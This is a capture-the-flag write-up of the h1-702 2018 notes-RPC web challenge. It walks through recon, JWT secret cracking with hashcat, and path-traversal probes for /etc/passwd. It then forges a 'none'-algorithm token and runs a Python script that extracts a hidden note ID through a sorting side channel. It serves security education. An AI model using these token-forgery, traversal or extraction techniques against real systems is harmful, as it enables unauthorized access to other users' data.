This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.
Upon navigating to the challenge URL, we're greeted with a message:
Notes RPC Capture The Flag Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag. Good luck, you might need it.
Alright, let's see if we can find some other files on the webserver. The two best options from here are checking robots.txt and running a file/directory search using common paths. Since /robots.txt gives a 404 error, we can move on to the next option with dirsearch:
$ python3 dirsearch.py -u http://159.203.178.9/ -e php,html,txt
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, html, txt | Threads: 10 | Wordlist size: 6657
Target: http://159.203.178.9/
[03:11:32] Starting:
[03:11:33] 403 - 299B - /.ht_wsr.txt
... <many more 403 errors>
[03:11:38] 200 - 597B - /index.html
[03:11:40] 200 - 11KB - /README.html
[03:11:40] 415 - 24B - /rpc.php
...
Task Completed
We've discovered two new files! Let's check out README.html first.
This page details how to interact with an RPC service that's accessible through the other file dirsearch discovered: rpc.php. To summarize, the service allows for the creation, retrieval, and deletion of text snippets ("notes"). In order to make my testing of this service easier, I started by writing a simple Python wrapper for it (later referenced as rpc.py):
import requests

url = "http://159.203.178.9/rpc.php"
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

GET = requests.get
POST = requests.post

def request(r, params=None, json=None):
    # every call carries the JWT and the versioned Accept header
    headers = {'Authorization': token, 'Accept': 'application/notes.api.v1+json'}
    resp = r(url, params=params, json=json, headers=headers)
    try:
        return resp.json()
    except ValueError:
        # body was not JSON (e.g. an empty error response); return the raw response
        return resp

def getNotesMetadata():
    return request(GET, params={'method': 'getNotesMetadata'})

def getNote(note_id):
    return request(GET, params={'method': 'getNote', 'id': note_id})

def createNote(note, note_id=None):
    if note_id is None:
        return request(POST, params={'method': 'createNote'}, json={'note': note})
    else:
        return request(POST, params={'method': 'createNote'}, json={'id': note_id, 'note': note})

def resetNotes():
    return request(POST, params={'method': 'resetNotes'})
After messing around with the service's methods and carefully reading the information provided in the README file, I identified some initial high-potential attack vectors to explore:
- Modifying the JWT
- Path traversal through note IDs
- Server information disclosure through PHP errors
One important note from the README is that the service uses JSON Web Tokens (JWTs) to authenticate users:
Authenticating to the service can be done through the Authorization header. When provided a valid JWT, the service will authenticate the user and allow to query metadata, retrieve a note, create new notes, and delete all notes.
We can view the contents of the token provided in the README by base64 decoding each individual piece, but for its simplicity I like to let jwt.io handle the work:
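For reference, the manual route is only a few lines of Python. This is a minimal sketch (written for Python 3; the helper name b64url_decode is made up for this example) that splits the README's token on dots and decodes the header and payload segments:

```python
import base64
import json

def b64url_decode(segment):
    # JWT segments are base64url with the padding stripped; restore it first
    padded = segment + "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(padded).decode("utf-8")

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

# a JWT is three dot-separated segments: header, payload, signature
header_b64, payload_b64, signature_b64 = token.split(".")
header = json.loads(b64url_decode(header_b64))
payload = json.loads(b64url_decode(payload_b64))

print(header)   # the algorithm and token type
print(payload)  # the claims, here just the user id
```

The signature segment is raw HMAC output, so there's nothing human-readable to decode there.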
From this I hypothesized that the payload's id field needs to be changed to another user (likely id=1) who created the note with the flag in it. However, in-place modification of the payload will invalidate the JWT's signature. Given this, there were two possible options apparent to me:
- Hope for a broken implementation and attempt the modification anyway
- Crack the server's JWT secret so that a valid signature can be created after payload modification
If ignoring the signature, all that needs to be done to change the payload's id field to 1 is to replace the payload section of the provided JWT with the base64 encoding of {"id":1} (with padding stripped) - eyJpZCI6MX0 - yielding a new token:
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
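One way to produce that payload segment and splice it into the token (an illustrative Python 3 sketch; b64url_encode is a helper name invented for this example, not part of any library):

```python
import base64

def b64url_encode(raw):
    # base64url-encode bytes and strip the '=' padding, as JWTs do
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

original = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
header, _old_payload, signature = original.split(".")

# swap in the new payload, leave header and (now stale) signature untouched
new_payload = b64url_encode(b'{"id":1}')
forged = ".".join([header, new_payload, signature])
print(forged)
```

The signature was computed over the original header and payload, so a server that actually verifies it should reject this token.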
Unfortunately, after changing the token in rpc.py to this new token, all requests failed with an authentication error, indicating that the signature was in fact being checked:
>>> rpc.getNotesMetadata()
{u'authorization': u'is invalid'}
It's possible that the JWT implementation was configured to use a weak user-defined secret instead of random bytes. To test this, we can attempt to crack the secret using password lists and/or full-on bruteforce. Thankfully, hashcat supports cracking JWTs. I attempted cracking with CrackStation's 15GB wordlist as well as up to a 6-character bruteforce, but both routes yielded no matches. I considered continuing the bruteforce with higher character lengths, but decided it was best to explore other vectors first. For anyone curious, the relevant hashcat commands are:
$ hashcat -m 16500 -a 0 <path_to_jwt> <path_to_wordlist> # use wordlist
$ hashcat -m 16500 -a 3 <path_to_jwt> ?a?a?a?a?a?a # 6-character bruteforce
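Conceptually, cracking an HS256 token boils down to recomputing the HMAC-SHA256 signature over the "header.payload" string with each candidate secret and comparing it to the token's signature. The sketch below illustrates that idea in Python 3; it is not how hashcat is implemented, and the function names, the demo token, and the secret "hunter2" are all made up for the example:

```python
import base64
import hashlib
import hmac

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def hs256_signature(signing_input, secret):
    # HS256 = HMAC-SHA256 over the ASCII "header.payload" string
    digest = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return b64url_encode(digest)

def guess_secret(token, candidates):
    signing_input, _, signature = token.rpartition(".")
    for candidate in candidates:
        expected = hs256_signature(signing_input.encode("ascii"),
                                   candidate.encode("utf-8"))
        if hmac.compare_digest(expected, signature):
            return candidate
    return None

# demo token signed locally with a made-up secret (NOT the challenge's secret)
demo_input = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0"
demo_token = demo_input + "." + hs256_signature(demo_input.encode("ascii"), b"hunter2")

found = guess_secret(demo_token, ["password", "letmein", "hunter2"])
print(found)
```

A pure-Python loop like this is far too slow for a 15GB wordlist, which is why a GPU cracker is the practical choice.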
The README mentions that notes are stored in files instead of a database:
Each note is stored in a secure file that consists of a unique key, the note, and the epoch of when the note was created.
Because of this, path traversal using the note id parameter via getNote could be a plausible vector. This quickly appeared to be a dead-end after trying numerous different traversal payloads, some of which are below:
>>> rpc.getNote('../../../../../../../../etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('../../../../../../../../etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('rpc.php')
{u'note': u'is not found'}
>>> rpc.getNote('../rpc.php')
{u'note': u'is not found'}
The display_errors configuration setting is enabled by default in PHP, meaning that uncaught errors can be rendered in HTTP responses. Runtime error messages can often reveal sensitive application information, so with this vector I hoped to discover other PHP files that rpc.php might be invoking - potentially widening the attack surface or revealing critical details. Because PHP is a weakly typed language, it's often trivial to throw errors by providing unexpected input types - which in this case would be non-strings. Specific to the Notes RPC service, non-string inputs can be provided through query string array parameters and JSON data types.
In PHP, query string parameters will be treated as an Array type if a pair of brackets immediately follows the parameter name like so: foo[]=123. By default the example parameter is still accessed by the name "foo", so references to it without validating its type first will likely cause errors. Unfortunately this method did not cause any (visible) errors with the Notes RPC service:
>>> rpc.request(rpc.GET, params={'method[]': 'getNotesMetadata'})
{u'method': u'not found'}
>>> rpc.request(rpc.GET, params={'method': 'getNote', 'id[]':'xyz'})
{u'note': u'is not found'}
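To make the array-parameter trick concrete, this small Python 3 sketch shows roughly what a params dict with a bracketed key looks like once it's URL-encoded. It uses the standard library's urlencode as a stand-in; the exact bytes requests puts on the wire may differ slightly:

```python
from urllib.parse import urlencode

# the brackets are percent-encoded in transit; PHP decodes the key and
# then treats "id[]" as an array-valued parameter named "id"
query = urlencode({"method": "getNote", "id[]": "xyz"})
print(query)
```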
The JSON specification supports multiple different data types. Using sub-objects ({}) in the JSON arguments to createNote, I was able to trigger internal server errors (code 500) but unfortunately no error output was provided:
>>> rpc.createNote([])
{u'url': u'/rpc.php?method=getNote&id=a5fb2de26211ddcfc5713a6bed0c6328'}
>>> rpc.createNote({})
<Response [500]>
>>> rpc.createNote({}).text
u''
>>> rpc.createNote('asdf', note_id=[])
{u'url': u'/rpc.php?method=getNote&id=Array'}
>>> rpc.createNote('asdf', note_id={})
<Response [500]>
>>> rpc.createNote('asdf', note_id={}).text
u''
With none of the initial vectors providing progress, I decided to re-evaluate the service. After considering and briefly attempting other common vulnerabilities such as SQL/Command Injection, it became apparent that there may have been something more evident that I had missed. In my re-evaluation of how the service uses JWTs, I started looking into past vulnerabilities in common PHP JWT libraries. This quickly led me to discover that there was a critical issue found in many libraries back in 2015 - a warning about it still being shown on jwt.io (which I somehow glossed over earlier):
The details of this vulnerability can be found here. A summary of it:
- The JWT specification includes a none algorithm (specified in the alg field of the token header)
- This algorithm is intended to be used when the integrity of a token has already been verified
- Vulnerable implementations treated tokens signed with the none algorithm as valid regardless of their signature
- This can be exploited by simply changing the alg field of the header to none and modifying the payload section to include any desired data
Using the modified token created earlier (the one with the payload's id changed to 1), we simply need to change the header from:
{"typ":"JWT","alg":"HS256"}
to:
{"typ":"JWT","alg":"none"}
Like the modified payload, the new header just needs to be base64 encoded. Replacing the token header with this modified version gives the new token:
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
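The header swap can be reproduced the same way as the payload swap. A short Python 3 sketch (b64url_encode is again a helper invented for this example):

```python
import base64

def b64url_encode(raw):
    # base64url-encode bytes and strip the '=' padding, as JWTs do
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

# token with the payload already changed to {"id":1}
tampered = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
_old_header, payload, signature = tampered.split(".")

# replace only the header; the stale signature is kept as-is
none_header = b64url_encode(b'{"typ":"JWT","alg":"none"}')
token = ".".join([none_header, payload, signature])
print(token)
```

The old signature no longer matches anything, but a vulnerable implementation never looks at it once alg is none.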
With the token now changed in rpc.py, let's try calling getNotesMetadata:
>>> rpc.getNotesMetadata()
{u'count': 1, u'epochs': [u'1528911533']}
Success! We now have the epoch of what's likely the flag note. But wait, notes are accessed by id, not epoch... Guess we're not done yet.
Now armed with the target note's epoch, I decided that I probably needed to find a way to extract its id based on the epoch value. Per the README, note IDs are randomly generated unless one is provided when calling createNote:
An optional ID. If not provided, it'll generate a 16 byte random string.
Noting that, I decided the two best approaches moving forward were:
- Looking into attacking the PRNG that generates note IDs
- Revisiting the recon stage to see if anything was missed
If the PRNG that generates note IDs was reversed, we in theory could recover the generated ID associated with the target note's epoch. Generally, attacking PRNGs involves a lot of guessing unless the target application is open-source. In the case of the Notes RPC service, we could hypothesize that PHP's mt_rand or rand functions are being used - both of which are known to be cryptographically insecure. However, attacks against these functions would be difficult to perform due to the generated numbers being bounded as well as not knowing how the charset is assembled. Given that, I decided to move on to something else so as not to waste too much time with guessing.
In the initial recon stage I had neglected to check the HTML source of the files discovered on the server. Lo and behold, a very helpful HTML comment can be found in the source of README.html:
<!--
Version 2 is in the making and being tested right now, it includes an optimized file format that
sorts the notes based on their unique key before saving them. This allows them to be queried faster.
Please do NOT use this in production yet!
-->
Jackpot! This gives us two new pieces of information:
- There's a version 2 API
- The next attack vector will probably involve version 2's sorting feature - getNotesMetadata being a primary candidate for that
The README file details the necessity of an Accept header that specifies the API version being used:
Accept: application/notes.api.v1+json
So to access the version 2 API, we likely just need to change v1 to v2, like so:
Accept: application/notes.api.v2+json
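Rather than hard-coding the header, the wrapper could take the API version as a parameter. A small sketch of that idea (build_headers and api_version are names invented for this example, not part of the original rpc.py):

```python
def build_headers(token, api_version=1):
    # same two headers the wrapper sends, with the version made configurable
    return {
        "Authorization": token,
        "Accept": "application/notes.api.v{}+json".format(api_version),
    }

headers = build_headers("<jwt goes here>", api_version=2)
print(headers["Accept"])
```

This makes it easy to flip between versions while comparing their behaviour.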
After changing this in rpc.py and creating a few test notes, the theorized change to getNotesMetadata is validated as note epochs now seem to be sorted based on the lexicographical ordering of note ID strings - not numerically by epoch as they were in version 1:
>>> rpc.createNote('asdf', note_id='C')
{u'url': u'/rpc.php?method=getNote&id=C'}
>>> rpc.createNote('asdf', note_id='A')
{u'url': u'/rpc.php?method=getNote&id=A'}
>>> rpc.createNote('asdf', note_id='B')
{u'url': u'/rpc.php?method=getNote&id=B'}
>>> rpc.getNotesMetadata()
{u'count': 4, u'epochs': [u'1529727460', u'1529727462', u'1529727456', u'1528911533']}
With this new sorting method we can perform a character-by-character bruteforce to extract the flag note's ID based on where a new note with a crafted ID appears in the list of note epochs generated by getNotesMetadata.
In case my explanation of the issue was a bit confusing, let's consider a theoretical note with an id of Y:
>>> sorted(['X', 'Y'])
['X', 'Y']
>>> sorted(['Z', 'Y'])
['Y', 'Z']
When a note with an ID of X is created, it will appear before Y in the sorted-by-ID list of epochs. If a note with an ID of Z is created, it will appear after Y in the list of epochs. Once this pivot occurs, we're able to determine that the unknown character must be between X and Z (exclusive), narrowing it down to Y in this case. That pivot search can be continued on a character-by-character basis until the full ID is extracted.
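The pivot idea can be tried out offline before pointing anything at the server. The sketch below is a simplified local simulation in Python 3, not the script used against the challenge: the oracle function stands in for "create a probe note, then check whether its epoch is listed before the flag note's epoch", and it assumes the service orders IDs the same way Python compares strings. The names make_oracle and extract_id are invented for this example.

```python
import string

CHARSET = sorted(string.ascii_letters + string.digits)

def make_oracle(secret_id):
    # stand-in for the service: True if the probe ID sorts at or before
    # the secret ID (treating an exact match as "before" is a
    # convenience of this simulation)
    def oracle(probe_id):
        return probe_id <= secret_id
    return oracle

def extract_id(oracle, charset=CHARSET, max_len=128):
    known = ""
    while len(known) < max_len:
        best = None
        for ch in charset:
            if oracle(known + ch):
                best = ch      # still at or before the secret, keep going
            else:
                break          # pivot: this char sorts after the secret
        if best is None:
            break              # every extension sorts after: ID is complete
        known += best
    return known

recovered = extract_id(make_oracle("EelHIXsuAw4FXCa9epee"))
print(recovered)
```

Probing with the bare prefix plus one character (no padding) means a probe that is a prefix of the secret always sorts before it, which gives a clean stopping condition once the whole ID is known.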
I wrote a Python script to automate the extraction process (later referenced as attack.py):
import rpc

charset = sorted("0123456789abcdef")
target = "1528911533"  # target note's epoch
key = ['?'] * 16  # key should be 16 characters
pos = 0

while pos < len(key):
    found = False
    for i in range(len(charset)):
        # create key attempt using known values + current brute char
        tmp_key = key[:]
        tmp_key[pos] = charset[i]
        tmp_key_str = ''.join(tmp_key).replace('?', charset[0])

        # create note with id of key attempt to compare against unknown key
        rpc.resetNotes()
        rpc.createNote('asdf', note_id=tmp_key_str)
        tmp_epoch = rpc.getNote(tmp_key_str)['epoch']

        # use new note's epoch index to detect if next char has been found
        if rpc.getNotesMetadata()['epochs'][1] == tmp_epoch:
            key[pos] = charset[i - 1]
            pos += 1
            found = True
            print(''.join(key).replace('?', ''))
            break

    if not found:
        print('failed to get next char')
        break
Oddly, the script failed when I tried to run it:
$ python attack.py
0
failed to get next char
After investigating and attempting to find out why, I recalled an important piece of info from the README:
400 | Returned when the ID does not match /\A[a-zA-Z0-9]+\z/.
Although the randomly generated note IDs only contained hex characters, note IDs can contain any characters in the a-zA-Z0-9 charset. After implementing this change in attack.py:
import string
charset = sorted(string.ascii_letters + string.digits)
The script still failed with the same result as before. I theorized that the comparisons may be failing due to the target id being longer than the randomly generated IDs (16 characters). After changing the key length in attack.py to an arbitrarily larger number:
key = ['?'] * 128
The script finally started working!
E
Ee
Eel
...
EelHIXsuAw4FXCa9ep
EelHIXsuAw4FXCa9epe
EelHIXsuAw4FXCa9eped
failed to get next char
Sweet! Let's try to get that note now:
>>> rpc.getNote('EelHIXsuAw4FXCa9eped')
{u'note': u'is not found'}
WHAT?!?! After wanting to tear my hair out and taking another look at the script, it occurred to me that the comparison would fail on the last character because I didn't account for the final case where the two strings would be equal. To counter this, the value of the last character needs to be incremented (d -> e):
>>> rpc.getNote('EelHIXsuAw4FXCa9epee')
{u'note': u'NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==', u'epoch': u'1528911533'}
Base64-decoding the note:
>>> base64.b64decode('NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==')
'702-CTF-FLAG: NP26nDOI6H5ASemAOW6g'
We got the flag!
Thank you to HackerOne for hosting this fun and original challenge!
TL;DR:
- Find the README detailing the Notes RPC service
- Exploit a JWT library flaw to change the provided JWT's user id to 1
- See that the epoch of the flag note can now be accessed
- Find the HTML comment in the README mentioning API version 2 and its sorting functionality
- Exploit the sorting in version 2's getNotesMetadata method to extract the unknown flag note's id based on string ordering
The final version of rpc.py can be found here.
The final version of attack.py can be found here.
As a side note, I'd like to mention that the key extraction could be made much more efficient by implementing a binary search algorithm. However, because the search space is relatively small, the added efficiency isn't really necessary so I opted to not implement it for the sake of simplicity.
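For the curious, here is roughly what the binary search variant could look like. It's a local Python 3 simulation under the same assumptions as before (the oracle stands in for the create-note-and-check-ordering round trip, and IDs are assumed to sort the way Python compares strings); next_char, extract_id, and counting_oracle are names made up for this sketch.

```python
import string

CHARSET = sorted(string.ascii_letters + string.digits)

def next_char(oracle, prefix, charset):
    # find the largest char whose probe still sorts at or before the secret;
    # invariant: charset[:lo] all pass the oracle, charset[hi:] all fail
    lo, hi = 0, len(charset)
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(prefix + charset[mid]):
            lo = mid + 1
        else:
            hi = mid
    return charset[lo - 1] if lo > 0 else None

def extract_id(oracle, charset=CHARSET, max_len=128):
    known = ""
    while len(known) < max_len:
        ch = next_char(oracle, known, charset)
        if ch is None:
            break              # no extension fits: the ID is complete
        known += ch
    return known

calls = []

def counting_oracle(probe_id, secret_id="EelHIXsuAw4FXCa9epee"):
    # local stand-in for the service that also records each probe
    calls.append(probe_id)
    return probe_id <= secret_id

recovered = extract_id(counting_oracle)
print(recovered, len(calls))
```

With a 62-character charset this needs at most 6 probes per position instead of up to 62, and each probe against the real service costs several HTTP requests.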
Contact me on Twitter: @jsploit